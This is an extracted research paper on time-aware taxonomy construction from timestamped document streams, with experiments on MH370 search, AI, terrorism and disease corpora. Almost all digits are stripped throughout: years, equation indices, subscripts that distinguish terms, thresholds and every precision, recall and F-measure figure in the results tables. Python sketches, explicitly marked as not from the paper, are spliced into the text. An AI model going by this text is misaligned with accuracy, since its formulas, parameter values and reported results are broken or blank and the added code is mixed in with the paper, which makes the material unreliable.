( ) have combined both unsupervised statistical and linguistic methods to input documents & web data temporal information processing sentence timestamp domain term extraction taxonomic relation identification taxonomy induction existing taxonomy (new) taxonomy taxonomy construction figure : workflow of the proposed time-aware taxonomy construction method. find taxonomic relations. the approach that is closest to our work is the one proposed by zhu et al. ( ), which performs dynamic taxonomy update. to keep up with ever changing social media data, new terms are mined from incoming data and added to the existing tax- onomy. the data are divided into separate clusters using pre-defined time periods based on their docu- ment timestamps. the newly found taxonomic re- lations in each period are then added to the exist- ing taxonomy. the use of a pre-defined time pe- riod to discretize the time series of the documents for taxonomy update can be problematic. if the cho- sen time period is too long, rapid changes of do- main terms and their taxonomic relations that have occurred within the time period may not be reported. if the time period is too short, it may fail to identify valid taxonomic relations that needed a longer time period to establish. the method also does not re- move those relations in the existing taxonomy that may have become obsolete over time. problem specification we define the root term of a domain-specific taxon- omy as a word or phrase that represents the domain of interest. it can be any informative concept such as an entity (‘animal’) or event (‘ebola outbreak’). given a root term r, we define a corpus c as a pre- clustered set of a time series of text documents ac- cording to r. given two terms t and t , we denote t → t as a taxonomic relation where t is a hypernym of t . in this work, we define a taxonomy as a triple h = (v,e,s), where: • v is the set of the taxonomy’s vertices, i.e., the set of terms, including the root term. • e is the set of the taxonomy’s edges, i.e., the set of taxonomic relations. • s is the creation time of the taxonomy. it can be the current date or any specified time. our task is formally defined as follows: given a root term r, a corpus c and an optional existing taxonomy h = (v ,e ,s ) constructed at time s , we aim to build a new taxonomy h = (v ,e ,s ) at time s , where s > s , so that we can process the document set in c up to time s into the relevant terms in the taxonomy. if h does not exist, the problem becomes cre- ating a taxonomy h for corpus c. otherwise, the problem is to update the existing taxonomy with the newly obtained data for corpus c. note that while the taxonomy construction method is not a totally unsupervised method as it does require as input a corpus (c) pre-clustered by a domain of interest (i.e., r), the subsequent steps for constructing the taxon- omy given the text corpus are unsupervised. methodology figure shows the workflow of the proposed time- aware taxonomy construction method. there are two key processes in the proposed method: temporal information processing and taxonomy construction. . temporal information processing the aim of the temporal information processing pro- cess is to generate temporal information (or times- tamp for short) for each sentence in the input docu- ment or web data. previous taxonomy construction methods (zhu et al., ) only extract temporal information at the document level, i.e., all information in the document has the same timestamp as the document creation date. 
this assumption, however, is not always cor- rect. figure shows a sample report about the flight mh created on july . in this report, the timestamp of each sentence is very different from the document creation date. if we were to simply use the temporal information at the document level, the timestamps for the search areas of mh at dif- ferent periods will be incorrect. thus, we propose a figure : a sample report about the flight mh created on july . method to extract timestamps (i.e., temporal expres- sions) at the sentence level. the method comprises the following three steps: document creation date extraction: first, we ex- tract the timestamp at the document level. the text corpus that we are using for this study consists of a collection of reports, scientific publications and web search results. for the first two types of documents, the timestamp is the document creation date that can be extracted directly from the data source, i.e., the date of the report, or the date of the publication. for web search results, we use google advanced search with customized time range which returns the search results together with their creation dates at the begin- ning of search snippets. temporal expression extraction: next, the sec- ond step proceeds to extract all temporal expressions (e.g. “ december ”) in the document. here, we use sutime (chang and manning, ), a li- brary for recognizing and normalizing time expres- sion using a deterministic rule-based method. the output of this step is a list of time expressions, to- gether with their positions in the document. sentence timestamp extraction and normaliza- tion: finally, in the third step, we assign each sen- tence in the document a time expression as follows: • first, we assign a temporal value τ as the doc- ument creation date. • for each sentence s in the document: – if s contains a temporal expression τ , assign τ as the timestamp of s and update τ = τ . – otherwise, assign τ as the timestamp of s. note that we use the format ‘yyyy-mm-dd’ for the temporal expression. if the information of dd or mm is missing, it is replaced with the first day or first month respectively. for example, ‘december ’ will be normalized as ‘ - - ’. using the proposed method, sentence ( ) and sentence ( ) in the example of figure will have the same times- tamp of ‘ - - ’, while sentence ( ) will have the timestamp of ‘ - - ’. in section . , we will show that the extraction of timestamps at the sentence level will improve the performance of the proposed taxonomy construction method as compared to the extraction of timestamps at the document level. . taxonomy construction there are three general steps to constructing a tax- onomy: domain term extraction, taxonomic relation identification, and taxonomy induction. we make use of the taxonomy construction method of tuan et al. ( ) for the first step, incorporate times- tamps into the second step of identifying taxonomic relations (section . . ), and propose an incremen- tal taxonomy induction algorithm for the third step (section . . ). as extraction of domain term ex- traction does not affect the temporal aspects of tax- onomy construction, the first step of domain term extraction is not within the scope of this study. the reader can refer to tuan et al. ( ) or zhu et al. ( ) in which linguistic approaches to extract do- main terms are discussed. in this paper, we assume that the list of domain terms is available and we will focus only on discussing the second and third steps for taxonomy construction. . . 
taxonomic relation identification in this section, we give an overview of the method to identify taxonomic relations proposed in tuan et al. ( ). given an ordered pair of two terms t and t , tuan et al. ( ) calculates the evidence score that t → t based on the following three methods: syntactic contextual subsumption (scs): this method derives evidence for t → t from their syn- tactic contexts, particularly from triples of the form (subject,verb,object). it is observed that if the context set of t mostly contains that of t but not vice versa, then t is likely to be a hypernym of t . to implement this idea, the method finds the most common relation (or verb) r of t and t , submits the queries “t r” and “t r” to web search engine and collects all search results to construct two corpora corpusΓt and corpus Γ t for t and t . the syntac- tic context sets are then created from these contex- tual corpora using a non-taxonomic relation identifi- cation method. the details of scorescs(t , t ) can be found in tuan et al. ( ). lexical-syntactic pattern (lsp): this method is to find how much more evidence for t → t is found on the web than for t → t . specifically, a list of manually constructed taxonomic patterns (e.g., “t is a t ”) is queried with a web search engine to es- timate the amount of evidence for t → t from the web. the lsp measure is calculated as follows: scorelsp (t , t ) = log(|cweb(t , t )|) + log(|cweb(t , t )|) where cweb(t , t ) denotes the set of search results. string inclusion with wordnet (siwn): this method is to check the evidence for t → t by using the combination of string inclusion and references in wordnet synsets. scoresiwn(t , t ) is set to if there is such evidence; otherwise, it is set to . combined evidence: the three scores are then combined linearly as follows: score(t , t ) = α×scorescs(t , t ) + β ×scorelsp (t , t ) + γ ×scoresiwn(t , t ) if score(t , t ) is greater than a threshold value, then t is regarded as a hypernym of t . . . incorporating temporal information into taxonomic relation identification previous studies of taxonomic relation identifi- cation treated all evidence equally, i.e., evidence from is treated equally with evidence from . this assumption is not always appropriate, as discussed in section . we propose a time-aware method to identify taxonomic relations by incorpo- rating timestamps into the process of finding evi- dence, using the following timestamp contribution function: definition (timestamp contribution function). given a text sentence d with timestamp sd, the times- tamp contribution of d at time s is defined as: td(s ) = ξe −ξ(s −sd), ( ) where ξ is a control rate, s > sd and (s − sd) is the time lapse between sd and s . equation ( ) describes the timestamp contribution of a sentence at a specific time by using an expo- nential distribution function td. the intuition be- hind this function is that the evidence of taxonomic relations found in more recent sentences will be of higher relevance than that found in older sentences. this function is inspired by the work of efron and golovchinsky ( ), and li and croft ( ), in which it was used to effectively rank documents over time intervals. using the timestamp contribution function, we in- corporate temporal information into the three taxo- nomic relation identification methods described in section . . 
, as follows: lsp method: for each search result snippet d in cweb(t , t ) collected from the web search engine, we calculate the timestamp contribution score of d by using td: td(s ) = ξe−ξ(s −sd), where s is a chosen specific time (i.e., the time of taxonomy con- struction) and sd is the timestamp of d. note that sd has to be earlier than s . the unit of time lapse (s −sd) depends on the nature of corpus and can be, for instance, a day, a month or even a year. for ex- ample, if the corpus is from a fast-changing source such as social media, we can set the unit as day to keep up with the change of data on a daily basis. in contrast, for a corpus from slower changing domains such as scientific disciplines, the unit can be a year. the time-aware score for the lsp method is calcu- lated as follows: score time lsp (t , t ) = scorelsp (t , t ) × ∑ d∈cw eb(t ,t ) td(s ) |cweb(t , t )| ( ) in equation ( ), the original lsp evidence score is multiplied by the average timestamp contribution score of all evidence sentences for the taxonomic re- lation from the web. if the number of the returned search results is too large, we will use only the first , results to estimate the average timestamp con- tribution of evidence. note that the total timestamp contribution score of all evidence sentences ∑ d∈cweb(t ,t ) td(s ) can be considered as the “weighted size” of cweb(t , t ), i.e., we weigh each evidence sentence using equa- tion ( ) and sum all these weights. however, if we use only the “weighted size” of cweb(t , t ) for the time-aware score scoretimelsp (t , t ), there will be some issues. firstly, the score scoretimelsp will not be normalized with respect to the number of evi- dence sentences. this may lead to potential bias due to large amounts of past evidence—if there were an obsolete or incorrect taxonomic relation with many evidence sentences in the past, it may overwhelm the new taxonomic relations which may only have a small number of recent evidence sentences. sec- ondly, if we normalize the score, the information on the number of evidence sentences, which is im- portant for the lsp method to recognize true taxo- nomic relationships, will be lost. therefore, we pro- pose to use equation ( ), which combines both in- formation on the number of evidence sentences (em- bedded inside the original scorelsp score) and the normalized “weighted size” of cweb(t , t ). scs method: similarly, for each search result snip- pet d in corpusΓt and corpus Γ t , we calculate the timestamp contribution score of d using the function td: td(s ) = ξe−ξ(s −sd), where s is a specific time and sd is the timestamp of d. the time-aware score for scs method is calculated as follows: score time scs (t , t ) = scorescs(t , t ) × ( ∑ d ∈corpusΓt td (s ) |corpusΓt | + ∑ d ∈corpusΓt td (s ) |corpusΓt | ) ( ) in equation ( ), the original evidence score of t → t is multiplied by the average timestamp con- tribution scores of the returned search snippets. sim- ilar to equation ( ), equation ( ) combines both in- formation on the number of evidence sentences (em- bedded inside the original score scorescs) and the normalized “weighted size” of them. 
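as an illustration of how this weighting could be implemented, the following python sketch (not taken from the paper) computes the timestamp contribution of an evidence snippet and rescales an original lsp or scs evidence score by the average contribution of its snippets. the control rate, the snippet cap and the day-based time unit used below are placeholders chosen for illustration; the paper's own settings are discussed in its parameter sections.

```python
import math
from datetime import date

def timestamp_contribution(s1, sd, xi=0.5, unit_days=1):
    """td(s1) = xi * exp(-xi * (s1 - sd)), with the time lapse (s1 - sd)
    measured in a chosen unit (days here; use 365 for year-grained corpora)."""
    lapse = (s1 - sd).days / unit_days
    if lapse < 0:
        raise ValueError("evidence must not be dated after the construction time s1")
    return xi * math.exp(-xi * lapse)

def time_aware_score(base_score, evidence_dates, s1, xi=0.5, unit_days=1, max_snippets=1000):
    """weight an original evidence score (lsp or scs) by the average timestamp
    contribution of its evidence snippets, as in the time-aware scores above."""
    dates = list(evidence_dates)[:max_snippets]
    if not dates:
        return 0.0
    avg = sum(timestamp_contribution(s1, d, xi, unit_days) for d in dates) / len(dates)
    return base_score * avg

# toy usage: an lsp score of 3.2 backed by two recent snippets and one older one
s1 = date(2014, 4, 1)
snippet_dates = [date(2014, 3, 30), date(2014, 3, 28), date(2014, 3, 1)]
print(time_aware_score(3.2, snippet_dates, s1))
```

recent snippets keep most of their weight while old snippets are discounted exponentially, which is exactly the behaviour the timestamp contribution function is meant to provide.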
siwn method: because wordnet does not contain information about timestamps, we set: score time siwn(t , t ) = scoresiwn(t , t ) ( ) combined evidence: the final combined evidence score for the time-aware method is calculated as: score time (t , t ) = α×scoretimescs (t , t ) + β ×scoretimelsp (t , t ) + γ ×scoretimesiwn(t , t ) ( ) if the value scoretime(t , t ) is greater than a threshold value, we extract the relation t → t . . . parameter learning we need to estimate the optimal values for the pa- rameters α, β and γ which are used in equation ( ). for this purpose, we apply ridge regression (hastie et al., ). first, we use the time-aware method to create taxonomies for the ‘animal’, ‘plant’ and ‘ve- hicle’ domains using corpora constructed by a boot- strapping method (kozareva et al., ). then, we ask two annotators to construct gold standard tax- onomies of the three domains (see section . for more details) and use them to build the training sets. for each pair of terms (t , t ) found in the gold stan- dard taxonomies, its evidence score is estimated as (τ+ ), where τ is the threshold value for scoretime. finally, we use equation ( ) to learn the best combi- nation of α, β and γ using the ridge regression algo- rithm. note that we learn the parameters only once and use them subsequently for the other domains. . . incremental taxonomy induction to avoid reconstructing a taxonomy whenever there is new incoming data, we propose a novel in- cremental graph-based algorithm to update an exist- ing taxonomy with a given set of taxonomic rela- tions. the proposed algorithm updates a taxonomy automatically over time based on the information decay function defined below. definition (information decay function). given a taxonomic relation r, the information decay of r over the period from time s to time s is computed by the information decay function: dr(s ,s ) = e −λ(s −s ), ( ) where λ is a decay rate and s > s . the intuition behind the information decay func- tion is that the evidential value of a relation will de- crease over time at an exponential rate. given a root node r, a set of taxonomic rela- tions t and, optionally, an existing taxonomy h = (v ,e ,s ) created at time s with vertex set v and edge set e , the proposed graph-based algorithm constructs a new taxonomy h = (v ,e ,s ) cre- ated at time s with vertex set v and edge set e . t → t denotes the edge from t to t in a taxon- omy, and w(t → t ) as the weight of this edge (i.e., evidence score). algorithm consists of four steps: step : update existing taxonomy (lines - ) this step aims to update the existing taxonomy from algorithm taxonomy induction algorithm input: r: root node of taxonomy; t : new taxonomic relation set; h = (v ,e ,s ): existing taxonomy created at time s with vertex set v and edge set e ; output: h = (v ,e ,s ): new taxonomy created at time s with vertex set v and edge set e ; : set v = v and e = e : for each edge (t → t ) ∈e , t = r and t = r do : w(t → t ) = w(t → t ) ×e−λ(s −s ) : end for : for each relation (t → t ) ∈t do : if (t → t ) ∈e then : w(t → t ) = w(t → t ) + scoretime(t , t ) : else : e = e ∪ (t → t ) : w(t → t ) = scoretime(t , t ) : if t ∈ v then : v = v ∪{t } : end if : if t ∈ v then : v = v ∪{t } : end if : if @ (t → t ) ∈e and t = r then : e = e ∪ (r→ t ) : w(r→ t ) = : end if : if ∃ (r→ t ) ∈e then : e = e \ (r→ t ) : end if : end if : end for : edgefiltering(h ); : graphpruning(h ); time s to s . 
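before the step-by-step discussion of the algorithm resumes, the following condensed networkx sketch shows one way the four steps (weight decay, relation insertion, edge filtering, and pruning with edmonds' algorithm) could fit together. it is an illustration rather than the authors' implementation: the decay rate, threshold and root-edge weight are placeholder values, and root edges are exempted from decay and filtering here to keep the graph rooted.

```python
import math
import networkx as nx

def update_taxonomy(root, new_relations, old_tax=None, s1=0.0, s2=1.0,
                    lam=0.5, threshold=0.5, root_weight=1.0):
    """sketch of the four induction steps: decay, add relations, filter, prune.

    new_relations maps (parent, child) -> time-aware evidence score; old_tax is
    an nx.DiGraph whose edges carry a 'weight' attribute (or None on first run).
    """
    g = old_tax.copy() if old_tax is not None else nx.DiGraph()
    g.add_node(root)

    # step 1: decay existing edge weights; edges from the root are left untouched
    decay = math.exp(-lam * (s2 - s1))
    for u, v, data in g.edges(data=True):
        if u != root:
            data["weight"] *= decay

    # step 2: add or reinforce the newly identified relations
    for (t1, t2), score in new_relations.items():
        if g.has_edge(t1, t2):
            g[t1][t2]["weight"] += score
        else:
            g.add_edge(t1, t2, weight=score)
            if t1 != root and g.has_edge(root, t2):
                g.remove_edge(root, t2)               # t2 now has a real parent
        if t1 != root and g.in_degree(t1) == 0:
            g.add_edge(root, t1, weight=root_weight)  # orphan parents hang off the root

    # step 3: edge filtering; splice out a node whose only parent edge is dropped
    for u, v in list(g.edges()):
        if u == root or not g.has_edge(u, v) or g[u][v]["weight"] >= threshold:
            continue
        children = {c: g[v][c]["weight"] for c in g.successors(v)}
        g.remove_edge(u, v)
        if g.in_degree(v) == 0:
            g.remove_node(v)
            for c, w in children.items():
                g.add_edge(u, c, weight=w)

    # step 4: pruning with edmonds' algorithm (maximum spanning arborescence);
    # assumes the filtered graph still spans every remaining node from the root
    return nx.maximum_spanning_arborescence(g)
```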
in this step, the weight of each edge (t → t ) in e (except the edges connected to root r) is reduced using the information decay function: w(t → t ) = w(t → t )×dt →t (s ,s ) step : add new relations to existing taxonomy (lines - ) this step adds new taxonomic relations to the existing taxonomy and updates their weights. it adds each relation t → t as a directed edge from the parent node t to child node t if this edge does not exist in the existing taxonomy. otherwise, we update the weight of this edge with a new evidence score. if t does not have any parent node, t will become a child node of root r. the edge’s weight is updated as follows: w(t → t ) =    if t = r w(t → t ) + scoret ime(t , t ) if t →t ∈ e scoret ime(t , t ) otherwise the result of this step is a weighted connected graph containing all taxonomic relations with root r. step : edge filtering (line ) the graph gener- ated in step contains some edges with low evi- dence scores. the reason is that some relations in the existing taxonomy can become outdated during the period from s to s (according to the informa- tion decay function), and they do not exist in the new relation set. in this step, each edge t → t in the graph is revisited, and if its weight is lower than the threshold value of scoretime, it will be removed from the graph. in the case that t does not have any other parent node except t , t will be deleted from the vertex set, and edges from t to t ’s chil- dren will be added to the edge set with weights that are equal to the weights of the edges from t to t ’s children. then, all edges from t to t ’s children will be removed from the edge set. step : graph pruning (line ) the graph gener- ated in step is not an optimal tree as it may con- tain redundant edges or incorrect edges—for exam- ple, those edges that form a loop in the graph. this step aims to produce an optimal tree of the taxon- omy from the weighted graph in step . for this purpose, we apply edmonds’ algorithm (edmonds, ) for finding the optimal spanning arborescence for a weighted directed graph. using this algorithm, we can find a subset of the current edge set that forms a taxonomy where every non-root node has in-degree and the sum of the edge weights is max- imized. performance evaluation we have conducted two experiments for perfor- mance evaluation. the first experiment evaluates the performance of our proposed time-aware method on constructing a taxonomy from a given list of terms without any prior knowledge (i.e., without any exist- ing taxonomies). the second experiment evaluates the performance of our proposed method on taxon- omy update. . datasets we evaluate our method for taxonomy construction based on the following four datasets of document collections obtained from different domains: • artificial intelligence (ai) domain (navigli et al., ): the corpus is about the root term ‘artificial intelligence’, consisting of , papers extracted from the ijcai proceedings from to and the acl archives from year to . • mh domain: the corpus is about the root term ‘issues related to mh search’. mh is the missing flight that went down in the ocean on saturday, march . the corpus is created by querying the google search en- gine with the keyword “mh ” from march , to april , and collecting the first documents from the search results each day. after removing duplicates, the cor- pus contains a total of , documents. • terrorism domain: the corpus is about the root term ‘terrorism’. 
it contains reports from “patterns of global terrorism ( - )” and “country reports on terrorism ( - )” of the us state department. each re- port contains about , words. • disease domain: the corpus is about the root term ‘disease outbreak’, created by collecting reports from “disease outbreaks by year from to ” of who, and the email archive of promed which is an email based reporting system dedicated to reporting on disease out- breaks that affect human health. the corpus contains a total of , reports/emails. parameter settings. for the rapidly changing do- main ‘mh ’, we choose ‘day’ as the unit of the time lapse whereas for the other three domains, we use ‘year’ as the time lapse unit. we set the thresh- old value of scoretime in equation ( ) as . , and the control rate ξ in equation ( ) and decay rate λ in equation ( ) as . . the setting of these parameters will be discussed in section . . . evaluation on taxonomy construction . . experiment in this experiment, we compare our time-aware taxonomy construction method with other state-of- the-art methods in the task of constructing a new taxonomy from a given list of terms without any prior knowledge (i.e., without any existing taxon- omy). three state-of-the-art methods in the litera- ture are selected for comparison: http://www.fas.org/irp/threat/terror.htm http://www.state.gov/j/ct/rls/crt/index.htm http://www.who.int/csr/don/archive/year/en/ http://www.promedmail.org/ • zhu’s method (zhu et al., ): it constructs the taxonomy using evidence from multiple sources such as wordnet, wikipedia and web search engines. in their method, both statisti- cal and linguistic approaches are used to infer taxonomic relations. • kozareva’s method (kozareva and hovy, ): it constructs the taxonomy using evi- dence from a web search engine by matching the search results with a predefined set of syn- tactic patterns. • tuan’s method (tuan et al., ): it is the non time-aware method described in section . . . this method ignores temporal information dur- ing taxonomy construction. to evaluate the effectiveness of extracting times- tamps at the sentence level (as described in section . ), we also conduct an experiment on a setting that uses the timestamps out the document level (i.e., all evidence in the document will have the same times- tamp information as the document creation date). we use the subscript docstamp to denote this setting. . . evaluation metric in this experiment, we evaluate the constructed taxonomies against the manually created gold stan- dard taxonomies. the gold standard taxonomies are created as follows. for each domain, two annotators are employed at the same time to create taxonomies independently using the list of terms obtained from the domain term extraction module, according to the following rules: • rule (relevancy): every term in the taxon- omy should be related to the root term. • rule (appropriateness): each edge between two terms should be established at the time the taxonomy is created, if their relation is correct and not obsolete. a relation is obsolete if it is invalid at the time of consideration. • rule (hierarchical structure): the gold stan- dard taxonomy of each domain should form a tree, without redundant paths or cycles. the annotators then compare their constructed taxonomies. a taxonomic relation t → t is counted as an agreement if and only if both an- notators have t and t in their taxonomies, and there is a directed path from t to t . 
if an anno- tator has a taxonomic relation with one vertex not domain number of vertices average depth mh . ai . terrorism . disease . table : analysis of gold standard taxonomies. in the other annotator’s taxonomy, it will be consid- ered as a disagreement. after evaluation, the aver- age inter-annotator agreement on edges of the con- structed taxonomies between the two annotators is % using cohen’s kappa coefficient measurement. finally, the two annotators discuss to come up with the gold standard taxonomies. as a result, the num- ber of nodes and average depth of the taxonomies are summarized in table . we use precision, re- call and f-measure to measure the performance of taxonomy construction. let r and rgold be the set of taxonomic relations of our constructed taxonomy and the gold standard taxonomy respectively; then the metrics are given as follows: precision = |r∩rgold| |r| ; recall = |r∩rgold| |rgold| ; f-measure = × precision×recall precision + recall . . . experimental results the experimental results are given in table which shows that our time-aware method achieves significantly better performance than kozareva’s method and zhu’s method in terms of f-measure (t-test, p-value< . ). our method shows slightly lower precision than that of kozareva’s method due to the scs method, but much higher recall and f- measure than kozareva’s method. in contrast, our method shows slightly lower recall but much higher precision and f-measure than zhu’s method, which is based on statistical methods such as pointwise mutual information and cosine similarity. on aver- age, our time-aware method improves the f-measure by % compared to kozareva’s method, and by % compared to zhu’s method. moreover, the incorporation of timestamps into the time-aware method also contributes to better per- formance as it helps identify new taxonomic rela- tions effectively, while getting rid of obsolete and incorrect relations. as shown from the experimental results, the time-aware method shows significantly better performance than the non time-aware method (i.e. tuan’s method) in all four domains in terms of method domain p r f kozareva mh % % % zhu mh % % % tuan mh % % % time-awaredocstamp mh % % % time-aware mh % % % kozareva ai % % % zhu ai % % % tuan ai % % % time-awaredocstamp ai % % % time-aware ai % % % kozareva terrorism % % % zhu terrorism % % % tuan terrorism % % % time-awaredocstamp terrorism % % % time-aware terrorism % % % kozareva disease % % % zhu disease % % % tuan disease % % % time-awaredocstamp disease % % % time-aware disease % % % table : experimental results for taxonomy construction. p stands for precision, r for recall, and f for f-measure. f-measure (t-test, p-value< . ). on average, our time-aware method improves the f-measure by % compared to tuan’s method. we further examine the taxonomic relations iden- tified by the time-aware method but not by the non- time-aware method, and vice versa. we observed that around % of relations found by the time- aware method but not by the non-time-aware method are recent relations (i.e., relations found in recent documents), while around % of relations found by the non-time-aware method but not by the time- aware method are obsolete relations. the percentage of taxonomic relations that become obsolete in each of the datasets are summarized in table . domain percentage of obsolete relations mh % ai % terrorism % disease % table : percentage of taxonomic relations that become obsolete. 
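the metrics defined above amount to set overlap between the predicted and gold-standard edge sets. a minimal sketch, with an invented toy example, is:

```python
def taxonomy_prf(predicted_relations, gold_relations):
    """precision, recall and f-measure over sets of taxonomic relations,
    each relation being an ordered (hypernym, hyponym) pair."""
    predicted, gold = set(predicted_relations), set(gold_relations)
    overlap = len(predicted & gold)
    precision = overlap / len(predicted) if predicted else 0.0
    recall = overlap / len(gold) if gold else 0.0
    denom = precision + recall
    f_measure = 2 * precision * recall / denom if denom else 0.0
    return precision, recall, f_measure

# toy example: three predicted edges, two of which are in the gold standard
gold = {("animal", "dog"), ("animal", "cat")}
pred = {("animal", "dog"), ("animal", "cat"), ("dog", "cat")}
print(taxonomy_prf(pred, gold))   # (0.666..., 1.0, 0.8)
```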
for example, in the terrorism domain, our method recognizes ‘isis’ as a hyponym of ‘terrorist group’, while the three state-of-the-art methods can- not recognize this. in addition, while the other three methods have extracted the outdated taxonomic re- lation between ‘palestine liberation organization’ and ‘terrorist group’, our method was able to ig- nore it. the reason is that the three state-of-the- art methods inferred taxonomic relations using co- occurrence frequency, but ‘isis’ has only appeared in reports since . the occurrence frequency of ‘isis’ was very low compared to ‘palestine liber- ation organization’ which was mentioned over the past many years. in contrast, by using the timestamp contribution function to better profile the relevance of evidence over time, our method can recognize the recent relationship of ‘terrorist group’ with ‘isis’ while getting rid of the obsolete and incorrect rela- tion with ‘palestine liberation organization’. from the experimental results of the time-aware and time-awaredocstamp methods, we also observe that the use of timestamps extracted at the sentence level is more effective than the use of timestamps at the document level. the timestamps extracted at the sentence level can capture more precisely the tempo- ral information of the facts in fast-changing domains than those at the document level. the results showed that the use of sentence-level timestamps can im- prove the precision and recall of our taxonomy con- struction method, improving the f-measure by % on average, as compared to the use of timestamps at the document level. . evaluation on taxonomy update . . experiment for fast-changing domains, taxonomies should be frequently and quickly updated. in this experiment, we examine how the proposed time-aware method can effectively update the constructed taxonomies over time to keep up with the latest information trends. we use the case study of the ‘mh ’ domain for this experiment. during the search operation for the missing flight mh , there were several turning points which can be captured by the follow- ing phases (according to well-known news agencies such as cnn, bbc and the new york times): • phase (from march , ): the flight lost contact with the airport. the search started from the south china sea and gulf of thailand, and was extended to the strait of malacca. • phase (from march , ): images from satellites indicated the plane might have fallen into the indian ocean. the search focus was moved from the south of sumatra to the south- west of perth in the southern indian ocean. • phase (from march , ): estimation of the aircraft’s remaining fuel and the radar track led the search to shift to a new area, the north- west of perth in the southern indian ocean. we apply the proposed time-aware method to con- struct and update the taxonomy for ‘mh ’ incre- mentally every two days. we compare our time- aware method with the following three methods: • zhu’s method (zhu et al., ): it applies a graph-based algorithm to update taxonomies incrementally with timestamp information. • baseline : the taxonomy is updated with the newly obtained data every two days, but does not use any temporal information in either tax- onomic relation identification (section . . ) or taxonomy induction (section . . ). specifi- cally, step (update existing taxonomy) in sec- tion . . is excluded since we are not using any temporal information, so there is no updat- ing of the weights of the existing taxonomy us- ing the decay function. 
• baseline : we construct the taxonomies using temporal information every two days, but only with the new documents from these two days. this allows us to evaluate the effect of retiring all the taxonomic relations built from the previous documents instead of the gradual decay approach in our proposed method.

here we have chosen the time period of two days because the 'mh ' domain was a truly fast-changing domain. as we shall see shortly, even using only the new documents within those two days to build the taxonomy in our baseline method , there were new taxonomic relations updated from the latest information (as shown in the example in figure ).

. . evaluation metric
when constructing the gold standard taxonomies using the same rules described in section . , we asked the annotators to select for each parent term at most three sub-terms that are most related to it at the time of taxonomy construction. we denote the set of gold-standard taxonomic relations as sgold. in the same way, when applying the methods of taxonomy construction, we select for each parent term at most three sub-terms with the highest evidence scores. we denote the set of those automatically extracted taxonomic relations as s. we use the following metrics to evaluate the update of the taxonomy: precision = |s ∩ sgold| / |s|; recall = |s ∩ sgold| / |sgold|; f-measure = 2 × precision × recall / (precision + recall).

the intuition for limiting the sub-term number to three for the evaluation is that if a taxonomy can keep up with the newly updated data, it should be able to detect the emerging terms and relations and add them to the taxonomy with high evidence scores, so that the user can easily observe an emerging trend of information in the domain as it occurs. in addition, the method should also have the capability to remove any obsolete relations in the taxonomy when they are no longer valid.

. . experimental results
figure : performance results on taxonomy update over time in the 'mh ' domain (f-measure for each two-day update from march to april).

from the results shown in figure , we can see that our time-aware method achieves the best performance and significantly outperforms the two baseline methods and zhu's method in terms of f-measure (t-test, p-value < . ). one interesting point to observe is that there are two periods when the time-aware method shows much higher f-measure than the baseline methods and zhu's method: from march to march , and from march to march . during these periods, the performance of baseline method (which does not use any timestamp information) and zhu's method drops significantly, while our time-aware method's performance increases slightly.

one plausible explanation is that there are some turning points on march and march , which fall within these periods as described above. during these periods, many new terms/relations such as search area, search focus and search device are added to the corpus. our time-aware method was able to assign higher weights to the new taxonomic relations than to the older relations due to their recent timestamps, even though the frequencies of these new relations are lower than those of the older relations. in contrast, zhu's method and baseline method were unable to recognize these new relations due to their relatively low frequencies in the corpus. in addition, incorrect relations in the existing taxonomy were also removed from the new taxonomy using the information decay function by our time-aware method, whereas the other two methods still kept them in the taxonomy. in short, our time-aware method can update the taxonomy faster with the latest information trends, as well as remove incorrect relations effectively, as compared to the other methods.

also, from the experimental results of our time-aware method and the baseline method , we can observe that updating the existing taxonomy with new taxonomic relations is more effective than rebuilding a new taxonomy using only the new data. the reason is that although some older taxonomic relations are mentioned only occasionally in the new data, they are still valid. therefore, if we ignore the older data, their taxonomic relations will be lost in the new taxonomy when it is constructed with only the new data. in addition, there are also many taxonomic relations that needed a longer time period to become established.

figure shows an example of the changes of the hyponym list for the term 'search area' over time using different methods.
figure : top three hyponyms of 'search area' in 'issues related to mh search' taxonomies over time, for zhu's method, the two baseline methods and the time-aware method, shown against the actual search areas.
we observe that both the time-aware method and baseline method , which utilized the temporal information, can quickly update the relations with the latest information as compared to zhu's method and baseline method , which ignore temporal information for taxonomy construction. for example, in the taxonomy constructed on march , the time-aware method and baseline method can quickly recognize the change of the search area to 'southern indian ocean' and 'sumatra', thereby ranking them at the top of the hyponym list of 'search area', whereas zhu's method and baseline method both missed this update until march .
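the per-parent selection used in this evaluation and in the hyponym lists of figure , keeping at most three sub-terms with the highest evidence scores for each parent term, can be sketched as follows; the relation scores in the example are invented.

```python
from collections import defaultdict

def top_k_hyponyms(scored_relations, k=3):
    """keep, for each parent term, the k children with the highest evidence
    scores; this is the selection used to build the set s in the evaluation."""
    by_parent = defaultdict(list)
    for parent, child, score in scored_relations:
        by_parent[parent].append((score, child))
    return {parent: [child for _, child in sorted(children, reverse=True)[:k]]
            for parent, children in by_parent.items()}

# toy usage with made-up scores for the 'search area' example
relations = [("search area", "southern indian ocean", 2.4),
             ("search area", "sumatra", 1.9),
             ("search area", "south china sea", 0.7),
             ("search area", "gulf of thailand", 0.5)]
print(top_k_hyponyms(relations))   # top three children of 'search area'
```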
another interesting point is that due to the lack of temporal information, both zhu’s method and baseline method still ranked ‘south china sea’ at the top of the taxonomies constructed on april , while this term was removed earlier from the hyponym list of ‘search area’ by our time-aware method using temporal information. . parameter tuning in our method for taxonomy construction, some pa- rameters are tuned to optimize performance. the threshold value for scoretime in equation ( ) controls the number of extracted taxonomic re- lations. in general, the larger this threshold value is, the higher number of true taxonomic relations we can get. however, a higher number of incorrect re- lations may also occur. from our experiments, we found that the threshold value for scoretime can be set between . to . for the time-aware method to achieve the best performance. the control rate ξ in equation ( ) and decay rate λ in equation ( ) affect the contribution of old and new data. specifically, smaller values for the con- trol rate and decay rate will allow newer data to con- tribute more evidence of taxonomic relations than older data, whereas larger values will cause the old and new data to have similar evidence contribu- tions. according to our experiments, the time-aware method shows the best performance when the values of these rates are set between . to . . conclusion in this paper, we have proposed a novel time-aware method for taxonomy construction given a time se- ries of text documents from a domain that could be fast-changing with emerging concepts or events. by using timestamp contribution and information decay functions, our method can effectively utilize tempo- ral information for both taxonomic relation identifi- cation and taxonomy update. the experimental re- sults show that our method achieves better perfor- mance than the state-of-the-art methods. in addi- tion, the proposed method can be used to update the taxonomy incrementally over time and keep the tax- onomy up-to-date with the latest information trends for the domain. all the datasets, including the gold standards of the four domains and the outputs of our method, are publicly available at https://sites. google.com/site/tuanluu /research/tacl . acknowledgements we are grateful to action editors lillian lee and bo pang and the anonymous reviewers for their helpful suggestions, which substantially improved the present paper. https://sites.google.com/site/tuanluu 